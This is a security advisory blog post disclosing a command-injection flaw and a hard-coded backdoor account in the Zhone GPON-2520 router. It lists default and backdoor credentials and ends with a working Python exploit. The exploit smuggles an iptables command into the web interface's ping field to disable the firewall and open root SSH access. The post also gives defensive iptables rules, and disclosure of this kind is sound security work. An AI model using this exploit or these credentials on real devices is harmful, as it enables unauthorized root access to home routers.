Command Execution and Backdoor in Zhone GPON-252

Command Execution and Backdoor in Zhone GPON-252

Posted on Dec 18 2014   |  Plain text version

Summary

This post will describe a backdoor account found in the Zhone GPON-2520 and will provide a PoC which can be used to disable the firewall filtration rules in order to allow access to services such as ssh, telnet and ftp.

Description

The Zhone GPON-2520 with firmware R4.0.2.566b (distributed in Mexico by Axtel) contains two severe vulnerabilities:

The first vulnerability is arbitrary code execution with elevated privileges through the administrative web interface. This vulnerability had already been discovered and documented by Luis Colunga of Websec and affects Alcatel modems.

As a consequence of the first vulnerability, it is possible to enable remote access to the SSH service, which by default is filtered by the firewall. However, there is one caveat, the regular account for the web admin panel does not work with the SSH service. This is where the second vulnerability comes in: a backdoor account in which the password cannot be changed.

To facilitate the process, a PoC has been created to disable the firewall rules for the GPON which filter incoming traffic for ssh/telnet/ftp. This enables remote access to those services as a super user and has no adverse effects on the connectivity or availability of the device.

In the image below we can observe which ports are enabled by default on the GPON by running a port scan through https://w3dt.net.



The following ports are visible from the local network:

 



The only requirements needed to run the PoC is to know the internal IP address of the GPON and the username and password for the web interface which is root/admin by default.

 


Once we have confirmed access to the GPON, we can run the PoC. 
After running the PoC, the firewall rules which block incoming connections to critical services have succesfully been disabled.


The backdoor account can now be used to access the SSH service with super user privileges.

 


The configuration file for this backdoor can be located in the following file: /etc/rg_zhone.xml.

 


Interestingly enough, this same backdoor is also mentioned in advisories for Alcatel modems.

 


Once inside the device, it is easy enough to view the credentials for other services such as the FTP which has the username and password of "ont:ont".

 


By running a password cracker on the /etc/passwd file it is revealed that the password for root is "111111".

 



The interface for the super user has several different modes which become available after running the command "enable".

 


Essentially any part of the device can be accessed or controlled. For example, to disable the LEDs for the router one can run the following commands.

 


Finally, if something goes wrong and a rollback is required, all that needs to be done is to reset the GPON. Additionally, an extra layer of protection can me added by using IPTABLES to filter all traffic from the Internet to the GPON.


Block traffic from the Internet:

iptables -A INPUT -i wan0 -p tcp --dport 22 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 22 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 23 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 53 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 80 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 7001 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 7002 -j DROP

iptables -A INPUT -i wan0 -p tcp --dport 49152 -j DROP


Block traffic from the internal network:

iptables -A INPUT -i wan8 -p tcp --dport 22 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 22 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 23 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 53 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 80 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 7001 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 7002 -j DROP

iptables -A INPUT -i wan8 -p tcp --dport 49152 -j DROP


The following image shows the results of a port scan from the Internet after the IPTABLES have been added.

 


This post will not explain how to make these changes to the IPTABLES permanent as there is always a risk of damaging the device, so any testing done is under your own risk and responsability. However, we encourage you to share your comments, suggestions and ideas with us.

[email protected]

* This advisory was originally written by Luis Ramirez and translated by Roberto Salgado. The original advisory in Spanish can be found here.

POC

from httplib2 import Http

from urllib import urlencode

import sys,time



#main function

if __name__ == "__main__":



        if(len(sys.argv) != 4):

                print '*********************************************************************************'

                print ' GPON Zhone R4.0.2.566b RCE & Backdoor'

                print ' Tested on'

                print '          GPON Zhone 2520'

                print '          Hardware: 0040-48-02'

                print '          Software: R4.0.2.566b'

                print '                                 '

                print ' Usage : python', sys.argv[0] + ' <web_user> <web_pass>'

                print ' Ex :    python',sys.argv[0] + ' 192.168.15.1 root admin'

                print ' Author : Kaczinski [email protected] '

                print ' URL : http://www.websec.mx/advisories'

                print '*********************************************************************************'

                sys.exit()



HOST = sys.argv[1]

USER = sys.argv[2]

PASS = sys.argv[3]



print '*********************************************************************************'

print '[+] Logging in to the router: '+ HOST

print '[+] User: '+USER

print '[+] Pass: '+PASS

h = Http()

h.follow_redirects = True

data = dict(XWebPageName="index", username=USER, password=PASS)

resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))

result = content.find("")

if result < 0:

        print '[-] Authentication failed'

        print '*********************************************************************************'

        sys.exit()

else:

        print '[+] Authentication succeeded'

        print '[+] Deleting the firewall rule that blocks SSH'

        data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL", wan_conlist="default", diag_action="ping")

        resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))

        print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'

        print '[+] Done'

        resp, content = h.request("http://" + HOST + "/logout.html", "GET")

        sys.exit()


Latest Blog Entries

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

New publication: Mastering the Nmap Scripting Engine
We invite you to learn more about the latest publication from our team, "Mastering the Nmap Scripting Engine".

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.